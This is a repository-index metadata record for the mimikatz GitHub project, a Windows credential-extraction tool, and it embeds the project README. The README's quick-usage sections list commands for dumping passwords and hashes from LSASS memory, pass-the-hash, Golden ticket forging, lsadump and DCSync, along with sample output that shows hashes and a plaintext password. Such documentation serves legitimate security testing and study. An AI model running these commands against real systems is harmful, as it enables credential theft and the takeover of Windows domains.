{"id":13429632,"url":"https://github.com/gentilkiwi/mimikatz","last_synced_at":"2025-05-14T13:06:40.942Z","repository":{"id":15757414,"uuid":"18496166","full_name":"gentilkiwi/mimikatz","owner":"gentilkiwi","description":"A little tool to play with Windows security","archived":false,"fork":false,"pushed_at":"2025-05-11T22:32:30.000Z","size":6164,"stargazers_count":20159,"open_issues_count":179,"forks_count":3867,"subscribers_count":906,"default_branch":"master","last_synced_at":"2025-05-11T23:24:57.767Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"http://blog.gentilkiwi.com/mimikatz","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gentilkiwi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2014-04-06T18:30:02.000Z","updated_at":"2025-05-11T22:32:38.000Z","dependencies_parsed_at":"2023-01-14T00:15:09.713Z","dependency_job_id":"6bff1240-6213-41b5-bbd5-117340a7484a","html_url":"https://github.com/gentilkiwi/mimikatz","commit_stats":{"total_commits":332,"total_committers":9,"mean_commits":"36.888888888888886","dds":0.03614457831325302,"last_synced_commit":"a1fe3421cccb4920cfe8f373dffdad9ff4e1c580"},"previous_names":[],"tags_count":12,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gentilkiwi%2Fmimikatz","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gentilkiwi%2Fmimikatz/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gentilkiwi%2Fmimikatz/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gentilkiwi%2Fmimikatz/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gentilkiwi","download_url":"https://codeload.github.com/gentilkiwi/mimikatz/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254149953,"owners_count":22022851,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T02:00:42.853Z","updated_at":"2025-05-14T13:06:35.927Z","avatar_url":"https://github.com/gentilkiwi.png","language":"C","funding_links":["https://www.paypal.me/delpy/"],"categories":["C","Tools","\u003ca id=\"983f763457e9599b885b13ea49682130\"\u003e\u003c/a\u003eWindows","\u003ca id=\"3ed50213c2818f1455eff4e30372c542\"\u003e\u003c/a\u003e工具","Uncategorized","C (61)","Summary","C (286)","工具","加密、密码破解、字典","[↑](#table-of-contents) [Credential Access](https://attack.mitre.org/tactics/TA0006/)","6. [↑](#-content) Utility \u0026 Miscellaneous","Offensive (ATT\u0026CK tactics)","🔐 Credential Dumping \u0026 Kerberos Abuse","Operating Systems","🛡️ EDR Evasion Techniques","Security","Programming/Comp Sci/SE Things"],"sub_categories":["\u003ca id=\"86dc226ae8a71db10e4136f4b82ccd06\"\u003e\u003c/a\u003e密码","\u003ca id=\"caab36bba7fa8bb931a9133e37d397f6\"\u003e\u003c/a\u003eWindows","Uncategorized","网络服务_其他","[T1003 - Credential Dumping](https://attack.mitre.org/techniques/T1003)","Windows","6.6 [↑](#-content) System","贡献","📌 Persistence","🔹 LSASS Dumping \u0026 Credential Theft","Hack Tools","Hack Back","HTA"],"readme":"# mimikatz\n\n**`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.\n\nIt's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.\n\n```\n  .#####.   mimikatz 2.0 alpha (x86) release \"Kiwi en C\" (Apr  6 2014 22:02:03)\n .## ^ ##.\n ## / \\ ##  /* * *\n ## \\ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)\n  '#####'                                    with  13 modules * * */\n\n\nmimikatz # privilege::debug\nPrivilege '20' OK\n \nmimikatz # sekurlsa::logonpasswords\n \nAuthentication Id : 0 ; 515764 (00000000:0007deb4)\nSession           : Interactive from 2\nUser Name         : Gentil Kiwi\nDomain            : vm-w7-ult-x\nSID               : S-1-5-21-1982681256-1210654043-1600862990-1000\n        msv :\n         [00000003] Primary\n         * Username : Gentil Kiwi\n         * Domain   : vm-w7-ult-x\n         * LM       : d0e9aee149655a6075e4540af1f22d3b\n         * NTLM     : cc36cf7a8514893efccd332446158b1a\n         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30\n        tspkg :\n         * Username : Gentil Kiwi\n         * Domain   : vm-w7-ult-x\n         * Password : waza1234/\n...\n```\nBut that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on https://blog.gentilkiwi.com (in French, _yes_).\n\nIf you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases\n\n\n## Quick usage\n```\nlog\nprivilege::debug\n```\n\n### sekurlsa\n```\nsekurlsa::logonpasswords\nsekurlsa::tickets /export\n\nsekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd\n```\n\n### kerberos\n```\nkerberos::list /export\nkerberos::ptt c:\\chocolate.kirbi\n\nkerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi\n```\n\n### crypto\n```\ncrypto::capi\ncrypto::cng\n\ncrypto::certificates /export\ncrypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE\n\ncrypto::keys /export\ncrypto::keys /machine /export\n```\n\n### vault \u0026 lsadump\n```\nvault::cred\nvault::list\n\ntoken::elevate\nvault::cred\nvault::list\nlsadump::sam\nlsadump::secrets\nlsadump::cache\ntoken::revert\n\nlsadump::dcsync /user:domain\\krbtgt /domain:lab.local\n```\n\n## Build\n`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:\n* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 \u0026 x64** - http://www.microsoft.com/download/details.aspx?id=44914)\n* _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_\n\n`mimikatz` uses `SVN` for source control, but is now available with `GIT` too!\nYou can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)\n\n### Synchronize!\n* GIT URL is  : https://github.com/gentilkiwi/mimikatz.git\n* SVN URL is  : https://github.com/gentilkiwi/mimikatz/trunk\n* ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip\n\n### Build the solution\n* After opening the solution, `Build` / `Build Solution` (you can change architecture)\n* `mimikatz` is now built and ready to be used! (`Win32` / `x64` even `ARM64` if you're lucky)\n  * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.\n\n### ddk2003\nWith this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)\n\nFor this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.\n\nFollow instructions:\n* https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme\n* _https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_\n\n## Continuous Integration\n`mimikatz` project is available on AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz\n\nIts status is: ![AppVeyor CI status](https://ci.appveyor.com/api/projects/status/github/gentilkiwi/mimikatz?svg=true\u0026retina=true)\n\n## Licence\nCC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/\n\n`mimikatz` needs coffee to be developed:\n* PayPal: https://www.paypal.me/delpy/\n\n## Author\n* Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )\n* DCSync and DCShadow functions in `lsadump` module were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )\n\nThis is a **personal** development, please respect its philosophy and don't use it for bad things!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgentilkiwi%2Fmimikatz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgentilkiwi%2Fmimikatz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgentilkiwi%2Fmimikatz/lists"}